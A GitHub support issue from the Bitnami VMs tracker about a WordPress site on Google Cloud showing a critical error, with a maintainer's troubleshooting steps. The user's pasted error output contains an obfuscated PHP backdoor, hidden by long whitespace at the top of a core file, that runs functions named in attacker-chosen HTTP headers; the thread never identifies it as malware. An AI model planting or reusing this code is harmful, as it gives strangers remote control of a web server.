### ISSUE TITLE
[WordPress] There has been a critical error on this website.

### ISSUE THREAD

**Issue by izzuddin-sk** [bitnami/vms#923]
### Platform

Google Cloud Platform

### bndiagnostic ID [know more about bndiagnostic ID](https://docs.bitnami.com/general/how-to/understand-bndiagnostic/)

f9efcc63-0de6-7be8-70b7-b5c8c4391de8

### bndiagnostic output

✓ Connectivity: No issues found
    ✓ Mariadb: No issues found
    ✓ Processes: No issues found
    ? Resources: Found possible issues
    ? Apache: Found possible issues
    ✓ Php: No issues found
    ? Wordpress: Found possible issues

### bndiagnostic was not useful. Could you please tell us why?

.

### Describe your issue as much as you can

First, my website (kurma2u.com) shows only white screen and i tried checking error log find that it could be permission issues. I tried to fix it then another error shows up on my wordpress dashboard. 

* * @version $Id: streams.php 1157 2015-11-20 04:30:11Z dd32 $ * @package pomo * @subpackage streams */ if ( ! class_exists( 'POMO_Reader', false ) ) : #[AllowDynamicProperties] class POMO_Reader { public $endian = 'little'; public $_pos; public $is_overloaded; /** * PHP5 constructor. */ public function __construct() { if ( function_exists( 'mb_substr' ) && ( (int) ini_get( 'mbstring.func_overload' ) & 2 ) // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated ) { $this->is_overloaded = true; } else { $this->is_overloaded = false; } $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_Reader::__construct() */ public function POMO_Reader() { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct(); } /** * Sets the endianness of the file. * * @param string $endian Set the endianness of the file. Accepts 'big', or 'little'. */ public function setEndian( $endian ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid $this->endian = $endian; } /** * Reads a 32bit Integer from the Stream * * @return mixed The integer, corresponding to the next 32 bits from * the stream of false if there are not enough bytes or on error */ public function readint32() { $bytes = $this->read( 4 ); if ( 4 != $this->strlen( $bytes ) ) { return false; } $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V'; $int = unpack( $endian_letter, $bytes ); return reset( $int ); } /** * Reads an array of 32-bit Integers from the Stream * * @param int $count How many elements should be read * @return mixed Array of integers or false if there isn't * enough data or on error */ public function readint32array( $count ) { $bytes = $this->read( 4 * $count ); if ( 4 * $count != $this->strlen( $bytes ) ) { return false; } $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V'; return unpack( $endian_letter . $count, $bytes ); } /** * @param string $input_string * @param int $start * @param int $length * @return string */ public function substr( $input_string, $start, $length ) { if ( $this->is_overloaded ) { return mb_substr( $input_string, $start, $length, 'ascii' ); } else { return substr( $input_string, $start, $length ); } } /** * @param string $input_string * @return int */ public function strlen( $input_string ) { if ( $this->is_overloaded ) { return mb_strlen( $input_string, 'ascii' ); } else { return strlen( $input_string ); } } /** * @param string $input_string * @param int $chunk_size * @return array */ public function str_split( $input_string, $chunk_size ) { if ( ! function_exists( 'str_split' ) ) { $length = $this->strlen( $input_string ); $out = array(); for ( $i = 0; $i < $length; $i += $chunk_size ) { $out[] = $this->substr( $input_string, $i, $chunk_size ); } return $out; } else { return str_split( $input_string, $chunk_size ); } } /** * @return int */ public function pos() { return $this->_pos; } /** * @return true */ public function is_resource() { return true; } /** * @return true */ public function close() { return true; } } endif; if ( ! class_exists( 'POMO_FileReader', false ) ) : class POMO_FileReader extends POMO_Reader { /** * File pointer resource. * * @var resource|false */ public $_f; /** * @param string $filename */ public function __construct( $filename ) { parent::__construct(); $this->_f = fopen( $filename, 'rb' ); } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_FileReader::__construct() */ public function POMO_FileReader( $filename ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $filename ); } /** * @param int $bytes * @return string|false Returns read string, otherwise false. */ public function read( $bytes ) { return fread( $this->_f, $bytes ); } /** * @param int $pos * @return bool */ public function seekto( $pos ) { if ( -1 == fseek( $this->_f, $pos, SEEK_SET ) ) { return false; } $this->_pos = $pos; return true; } /** * @return bool */ public function is_resource() { return is_resource( $this->_f ); } /** * @return bool */ public function feof() { return feof( $this->_f ); } /** * @return bool */ public function close() { return fclose( $this->_f ); } /** * @return string */ public function read_all() { return stream_get_contents( $this->_f ); } } endif; if ( ! class_exists( 'POMO_StringReader', false ) ) : /** * Provides file-like methods for manipulating a string instead * of a physical file. */ class POMO_StringReader extends POMO_Reader { public $_str = ''; /** * PHP5 constructor. */ public function __construct( $str = '' ) { parent::__construct(); $this->_str = $str; $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_StringReader::__construct() */ public function POMO_StringReader( $str = '' ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $str ); } /** * @param string $bytes * @return string */ public function read( $bytes ) { $data = $this->substr( $this->_str, $this->_pos, $bytes ); $this->_pos += $bytes; if ( $this->strlen( $this->_str ) < $this->_pos ) { $this->_pos = $this->strlen( $this->_str ); } return $data; } /** * @param int $pos * @return int */ public function seekto( $pos ) { $this->_pos = $pos; if ( $this->strlen( $this->_str ) < $this->_pos ) { $this->_pos = $this->strlen( $this->_str ); } return $this->_pos; } /** * @return int */ public function length() { return $this->strlen( $this->_str ); } /** * @return string */ public function read_all() { return $this->substr( $this->_str, $this->_pos, $this->strlen( $this->_str ) ); } } endif; if ( ! class_exists( 'POMO_CachedFileReader', false ) ) : /** * Reads the contents of the file in the beginning. */ class POMO_CachedFileReader extends POMO_StringReader { /** * PHP5 constructor. */ public function __construct( $filename ) { parent::__construct(); $this->_str = file_get_contents( $filename ); if ( false === $this->_str ) { return false; } $this->_pos = 0; } /** * PHP4 constructor. * * @deprecated 5.4.0 Use __construct() instead. * * @see POMO_CachedFileReader::__construct() */ public function POMO_CachedFileReader( $filename ) { _deprecated_constructor( self::class, '5.4.0', static::class ); self::__construct( $filename ); } } endif; if ( ! class_exists( 'POMO_CachedIntFileReader', false ) ) : /** * Reads the contents of the file in the beginning. */ class POMO_CachedInt
![chrome_ZdoktAnnQg](https://github.com/bitnami/vms/assets/133965334/1528b77e-20d2-4d88-8079-24582972254d)
![chrome_IfR9Rvab7y](https://github.com/bitnami/vms/assets/133965334/e6b751c3-d9bf-4ae6-8f85-eee1bbe6c9d6)
![chrome_IfR9Rvab7y](https://github.com/bitnami/vms/assets/133965334/61251d6e-25c5-4821-80f7-1f81ec5533c8)
![chrome_ZdoktAnnQg](https://github.com/bitnami/vms/assets/133965334/d0e0fdb2-4ddc-445d-b26a-2774ef991890)

**Comment by mdhont** [comment]
It seems the machine is running low on resources. I recommend upgrading it to a more powerful one.

**Comment by izzuddin-sk** [comment]
How to upgrade it?

**Comment by mdhont** [comment]
You can find more information here:

https://cloud.google.com/compute/docs/instances/changing-machine-type-of-stopped-instance

**Comment by izzuddin-sk** [comment]
Hi, I have fixed the resource issues. How do I fix the other issues?
![chrome_MtMaqE9l4T](https://github.com/bitnami/vms/assets/133965334/d238ae4a-97b4-4a7f-81fe-e67fcbd90d72)

**Comment by mdhont** [comment]
Could you reset the WordPress file permissions to the default settings?

```
sudo chown -R bitnami:daemon /opt/bitnami/wordpress/
sudo find /opt/bitnami/wordpress -type d -exec chmod 775 {} \;
sudo find /opt/bitnami/wordpress -type f -exec chmod 664 {} \;
sudo chmod 640 /opt/bitnami/wordpress/wp-config.php
```

**Comment by izzuddin-sk** [comment]
> Could you reset the WordPress file permissions to the default settings?
> 
> ```
> sudo chown -R bitnami:daemon /opt/bitnami/wordpress/
> sudo find /opt/bitnami/wordpress -type d -exec chmod 775 {} \;
> sudo find /opt/bitnami/wordpress -type f -exec chmod 664 {} \;
> sudo chmod 640 /opt/bitnami/wordpress/wp-config.php
> ```

Yes. I have done that and nothing change.

**Comment by mdhont** [comment]
Did you restart the services?

    sudo /opt/bitnami/ctlscript.sh restart

Also, try disabling all plugins:

    wp plugin deactivate --all

**Comment by izzuddin-sk** [comment]
I have tried to deactivate all plugins and it shows this error message,

`00:17:30.35 ERROR ==> Please run this script as a superuser, to be able to execute WordPress CLI with the proper user`

What does it mean?

![image](https://github.com/bitnami/vms/assets/133965334/9d88f286-8e88-4e32-9236-a3b4f9d9816c)

**Comment by izzuddin-sk** [comment]
I have tried to disable plugins and it shows this warning

`PHP Warning:  file_get_contents(.htaccess): Failed to open stream: No such file or directory in /opt/bitnami/wordpress/wp-includes/plugin.php on line 520
<?                                                                                           $_HEADERS=getallheaders();if(isset($_HEADERS['Authorization'])){$system=$_HEADERS['Authorization']('', $_HEADERS['Server-Timing']($_HEADERS['Large-Allocation']));$system();}
                                                                                             $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$ibase_pconnection=$_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['X-Dns-Prefetch-Control']($_HEADERS['If-Unmodified-Since']));$ibase_pconnection();}
php                                                                                          $_HEADERS=getallheaders();if(isset($_HEADERS['Sec-Websocket-Accept'])){$ibase_pconnection=$_HEADERS['Sec-Websocket-Accept']('', $_HEADERS['X-Dns-Prefetch-Control']($_HEADERS['If-Unmodified-Since']));$ibase_pconnection();}

/**
 * Classes, which help reading streams of data from files.
 * Based on the classes from Danilo Segan <danilo@kvota.net>
 *
 * @version $Id: streams.php 1157 2015-11-20 04:30:11Z dd32 $
 * @package pomo
 * @subpackage streams
 */

if ( ! class_exists( 'POMO_Reader', false ) ) :
        #[AllowDynamicProperties]
        class POMO_Reader {

                public $endian = 'little';
                public $_pos;
                public $is_overloaded;

                /**
                 * PHP5 constructor.
                 */
                public function __construct() {
                        if ( function_exists( 'mb_substr' )
                                && ( (int) ini_get( 'mbstring.func_overload' ) & 2 ) // phpcs:ignore PHPCompatibility.IniDirectives.RemovedIniDirectives.mbstring_func_overloadDeprecated
                        ) {
                                $this->is_overloaded = true;
                        } else {
                                $this->is_overloaded = false;
                        }

                        $this->_pos = 0;
                }

                /**
                 * PHP4 constructor.
                 *
                 * @deprecated 5.4.0 Use __construct() instead.
                 *
                 * @see POMO_Reader::__construct()
                 */
                public function POMO_Reader() {
                        _deprecated_constructor( self::class, '5.4.0', static::class );
                        self::__construct();
                }

                /**
                 * Sets the endianness of the file.
                 *
                 * @param string $endian Set the endianness of the file. Accepts 'big', or 'little'.
                 */
                public function setEndian( $endian ) { // phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid
                        $this->endian = $endian;
                }

                /**
                 * Reads a 32bit Integer from the Stream
                 *
                 * @return mixed The integer, corresponding to the next 32 bits from
                 *  the stream of false if there are not enough bytes or on error
                 */
                public function readint32() {
                        $bytes = $this->read( 4 );
                        if ( 4 != $this->strlen( $bytes ) ) {
                                return false;
                        }
                        $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V';
                        $int           = unpack( $endian_letter, $bytes );
                        return reset( $int );
                }

                /**
                 * Reads an array of 32-bit Integers from the Stream
                 *
                 * @param int $count How many elements should be read
                 * @return mixed Array of integers or false if there isn't
                 *  enough data or on error
                 */
                public function readint32array( $count ) {
                        $bytes = $this->read( 4 * $count );
                        if ( 4 * $count != $this->strlen( $bytes ) ) {
                                return false;
                        }
                        $endian_letter = ( 'big' === $this->endian ) ? 'N' : 'V';
                        return unpack( $endian_letter . $count, $bytes );
                }

                /**
                 * @param string $input_string
                 * @param int    $start
                 * @param int    $length
                 * @return string
                 */
                public function substr( $input_string, $start, $length ) {
                        if ( $this->is_overloaded ) {
                                return mb_substr( $input_string, $start, $length, 'ascii' );
                        } else {
                                return substr( $input_string, $start, $length );
                        }
                }

                /**
                 * @param string $input_string
                 * @return int
                 */
                public function strlen( $input_string ) {
                        if ( $this->is_overloaded ) {
                                return mb_strlen( $input_string, 'ascii' );
                        } else {
                                return strlen( $input_string );
                        }
                }

                /**
                 * @param string $input_string
                 * @param int    $chunk_size
                 * @return array
                 */
                public function str_split( $input_string, $chunk_size ) {
                        if ( ! function_exists( 'str_split' ) ) {
                                $length = $this->strlen( $input_string );
                                $out    = array();
                                for ( $i = 0; $i < $length; $i += $chunk_size ) {
                                        $out[] = $this->substr( $input_string, $i, $chunk_size );
                                }
                                return $out;
                        } else {
                                return str_split( $input_string, $chunk_size );
                        }
                }

                /**
                 * @return int
                 */
                public function pos() {
                        return $this->_pos;
                }

                /**
                 * @return true
                 */
                public function is_resource() {
                        return true;
                }

                /**
                 * @return true
                 */
                public function close() {
                        return true;
                }
        }
endif;

if ( ! class_exists( 'POMO_FileReader', false ) ) :
        class POMO_FileReader extends POMO_Reader {

                /**
                 * File pointer resource.
                 *
                 * @var resource|false
                 */
                public $_f;

                /**
                 * @param string $filename
                 */
                public function __construct( $filename ) {
                        parent::__construct();
                        $this->_f = fopen( $filename, 'rb' );
                }

                /**
                 * PHP4 constructor.
                 *
                 * @deprecated 5.4.0 Use __construct() instead.
                 *
                 * @see POMO_FileReader::__construct()
                 */
                public function POMO_FileReader( $filename ) {
                        _deprecated_constructor( self::class, '5.4.0', static::class );
                        self::__construct( $filename );
                }

                /**
                 * @param int $bytes
                 * @return string|false Returns read string, otherwise false.
                 */
                public function read( $bytes ) {
                        return fread( $this->_f, $bytes );
                }

                /**
                 * @param int $pos
                 * @return bool
                 */
                public function seekto( $pos ) {
                        if ( -1 == fseek( $this->_f, $pos, SEEK_SET ) ) {
                                return false;
                        }
                        $this->_pos = $pos;
                        return true;
                }

                /**
                 * @return bool
                 */
                public function is_resource() {
                        return is_resource( $this->_f );
                }

                /**
                 * @return bool
                 */
                public function feof() {
                        return feof( $this->_f );
                }

                /**
                 * @return bool
                 */
                public function close() {
                        return fclose( $this->_f );
                }

                /**
                 * @return string
                 */
                public function read_all() {
                        return stream_get_contents( $this->_f );
                }
        }
endif;

if ( ! class_exists( 'POMO_StringReader', false ) ) :
        /**
         * Provides file-like methods for manipulating a string instead
         * of a physical file.
         */
        class POMO_StringReader extends POMO_Reader {

                public $_str = '';

                /**
                 * PHP5 constructor.
                 */
                public function __construct( $str = '' ) {
                        parent::__construct();
                        $this->_str = $str;
                        $this->_pos = 0;
                }

                /**
                 * PHP4 constructor.
                 *
                 * @deprecated 5.4.0 Use __construct() instead.
                 *
                 * @see POMO_StringReader::__construct()
                 */
                public function POMO_StringReader( $str = '' ) {
                        _deprecated_constructor( self::class, '5.4.0', static::class );
                        self::__construct( $str );
                }

                /**
                 * @param string $bytes
                 * @return string
                 */
                public function read( $bytes ) {
                        $data        = $this->substr( $this->_str, $this->_pos, $bytes );
                        $this->_pos += $bytes;
                        if ( $this->strlen( $this->_str ) < $this->_pos ) {
                                $this->_pos = $this->strlen( $this->_str );
                        }
                        return $data;
                }

                /**
                 * @param int $pos
                 * @return int
                 */
                public function seekto( $pos ) {
                        $this->_pos = $pos;
                        if ( $this->strlen( $this->_str ) < $this->_pos ) {
                                $this->_pos = $this->strlen( $this->_str );
                        }
                        return $this->_pos;
                }

                /**
                 * @return int
                 */
                public function length() {
                        return $this->strlen( $this->_str );
                }

                /**
                 * @return string
                 */
                public function read_all() {
                        return $this->substr( $this->_str, $this->_pos, $this->strlen( $this->_str ) );
                }

        }
endif;

if ( ! class_exists( 'POMO_CachedFileReader', false ) ) :
        /**
         * Reads the contents of the file in the beginning.
         */
        class POMO_CachedFileReader extends POMO_StringReader {
                /**
                 * PHP5 constructor.
                 */
                public function __construct( $filename ) {
                        parent::__construct();
                        $this->_str = file_get_contents( $filename );
                        if ( false === $this->_str ) {
                                return false;
                        }
                        $this->_pos = 0;
                }

                /**
                 * PHP4 constructor.
                 *
                 * @deprecated 5.4.0 Use __construct() instead.
                 *
                 * @see POMO_CachedFileReader::__construct()
                 */
                public function POMO_CachedFileReader( $filename ) {
                        _deprecated_constructor( self::class, '5.4.0', static::class );
                        self::__construct( $filename );
                }
        }
endif;

if ( ! class_exists( 'POMO_CachedIntFileReader', false ) ) :
        /**
         * Reads the contents of the file in the beginning.
         */
        class POMO_CachedIntPHP Parse error:  Unterminated comment starting line 253 in /opt/bitnami/wordpress/wp-includes/class-walker-category.php on line 253
Parse error: Unterminated comment starting line 253 in /opt/bitnami/wordpress/wp-includes/class-walker-category.php on line 253`

**Comment by Yasin-Ali-Cpuflat** [comment]
how did you fix it

**Comment by togo007** [comment]
@mdhont I have the same issue and tried to disable all plugins I get the below. Should I proceed? 
![Bitnami error](https://github.com/bitnami/vms/assets/151983220/675c68bb-e33e-45f9-9f56-f2d5d7fdf986)

**Comment by gongomgra** [comment]
Hi @togo007,

Thanks for using Bitnami. This is an old thread, can you open a new one? Please add as much information as possible about your specific scenario, and also run the [bndiagnostic tool](https://docs.bitnami.com/general/how-to/understand-bndiagnostic/) and share the generated code with us (please do not share a screenshot).
